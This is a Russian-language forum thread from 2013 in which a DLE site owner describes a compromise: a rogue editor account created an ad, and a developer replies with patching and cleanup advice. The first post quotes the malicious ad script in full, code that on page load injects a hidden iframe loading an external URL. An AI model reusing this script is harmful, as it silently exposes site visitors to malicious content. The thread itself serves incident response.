harmoshka 1 Опубликовано: 25 декабря 2013 Рассказать Опубликовано: 25 декабря 2013 (изменено) . Яндекс опять ругается на сайт. Уже неоднократно я попадал под вирусы, так как не совсем серьезно относился к мерам безопасности. Сейчас же все ошибки безопасности стараюсь править сразу же после их публикации на dle-news.ru. Расскажу о самом вирусе. В разделе "Список действий в админпанели" я заметил, что некий "floop" с правами Редактора авторизировался в админке и создал рекламное объявление. Захожу в управление рекламными объявлениями и меня спустя несколько секунд редиректит на сайт rambler.ru. Так было три раза подряд. Сейчас (спустя минут 30) меня уже не редиректит на него. Понять не могу, что это такое... К слову — сайт rambler.ru для меня на столько неинтересен, что я его не посещал уже несколько лет... Так вот... Захожу в само рекламное обьвление и вижу такое содержание: <script type='text/javascript'> function create_frame(url) { var melm = document.getElementById('partyeverybody28'); if (typeof(melm) != 'undefined' && melm!= null) {}else{ var iframe = document.createElement('iframe'); iframe.id = "partyeverybody28"; iframe.style.width = "0px"; iframe.style.height = "0px"; iframe.style.border = "0px"; iframe.frameBorder = "0"; iframe.style.display = "none"; iframe.setAttribute("frameBorder", "0"); document.body.appendChild(iframe); iframe.src = url; return true; } } function toyotahondaporsche(){ create_frame("http://urlerser.ru/?id=1"); } try { if(window.attachEvent) { window.attachEvent('onload', toyotahondaporsche); } else { if(window.onload) { var curronload = window.onload; var newonload = function() { curronload(); toyotahondaporsche(); }; window.onload = newonload; } else { window.onload = toyotahondaporsche; } } } catch(err) {} </script> Сам баннер на сайте увидеть не удается. Пробовал и с компьютера и с Андроид телефона... На андроиде никаких редиректов не заметил. Просматривал сайт через Гостя... Про редактора. Имя: floop Дата регистрации: 13 июля 2013 - 23:59 Дата авторизации и создания баннера: 24 декабря 2013 - 19:48 Айпи: 195.211.149.65 Пользователя удалил. Рекламный баннер тоже. Сейчас меняю пароли на админку, БД и ФТП. Можете сказать, что это такое? Как бороться? Админу могу предоставить доступ к сайту. Я буду безумно балгодарен тому, кто поможет полностью разобраться с проблемой. Сайт addgadget.net. DLE 10.0 P.S. В .htaccess заметил такие вот строчки: RewriteCond %{HTTP_HOST} ^171.25.204.148$ RewriteRule ^(.*)$ http://addgadget.net/ [R=301] Не припомню такого раньше... Что это? ---------------------------------------------------------- Пользователя не удалил пока. Зашел в "Редактирование пользователей" и не увидел аккаунта, с правами редактора. Есть только список тех людей, которых я создал и которых знаю. Нахожу опять этого пользователя и замечаю, что он находится в группе "Редактор", а не в нормальной "Редакторы". Получается, была создана группа... Данная группа имеет полный доступ в админпанель. Все остальные настройки такие же, как и у пользователей. Напомню, в разделе "Список действий в админпанели" видно только что пользователь авторизировался и создал баннер. Никакой другой информации там нет... На протяжении месяца видно, как кто-то "ломился" в админку. Множество записей "Неудачная попытка авторизации на сайте с использованием неверного пароля.". Это был не я, уверяю вас Я помню свой пароль отлично. Никогда не ошибаюсь.... Изменено 25 декабря 2013 пользователем harmoshka Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 072 Опубликовано: 25 декабря 2013 Рассказать Опубликовано: 25 декабря 2013 Можете сказать, что это такое? Как бороться? Админу могу предоставить доступ к сайту. Доступ к различным разделам админпанели настраивается в настройках групп, там и запрещайте доступ к управлению рекламой для редакторов. Вообще давать статус редактора, и к админпанели в целом посторонним лицам крайне неразумно. Запрещайте для всех кроме администраторов доступ к админпанели, а всех администраторов кроме себя удалите. Сайт addgadget.net. DLE 10.0 P.S. В .htaccess заметил такие вот строчки: RewriteCond %{HTTP_HOST} ^171.25.204.148$ RewriteRule ^(.*)$ http://addgadget.net/ [R=301] Это вы уже сами себе поставили, что если заходят по IP на сайт, то его редиректило на домен. Угрозы это никакой не предствавляет. А вот забывчивость это конечно плохо, нужно помнить что вы делали в файлах скрипта, или записывать. Есть только список тех людей, которых я создал и которых знаю. Нахожу опять этого пользователя и замечаю, что он находится в группе "Редактор", а не в нормальной "Редакторы". Получается, была создана группа... Данная группа имеет полный доступ в админпанель. Возможно группа была создана напрямую в БД, это возможно если не был вовремя установлен патч http://dle-news.ru/bags/v10/1580-potencialnaya-ugroza-v-module-minify.html после установки данного патча нужно обязательно менять пароли к БД.Вообщем рекомендации следующие: 1. Проверить что вы установили выше указаный патч. 2. Сменить пароли к БД. 3. Проверить настройки групп. 4. Удалить лишние группы и лишних администраторов. Знаете вы их или нет неважно, могли украсть их доступы к сайту. 5. Проверить антивирусом в админпанели файлы и удалить все на что он укажет. 6. Если есть сторонние модули и модификации, то удалить их. Цитата Ссылка на сообщение Поделиться на других сайтах
harmoshka 1 Опубликовано: 26 декабря 2013 Рассказать Опубликовано: 26 декабря 2013 Автор Блин... Про редирект забыл Прошу прощения... После установки патча забыл сменить пароль на БД. Думал что беда меня обошла стороной... Ага... Все везде поменял. Буду следить за развитием. Спасибо за рекомендации... Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.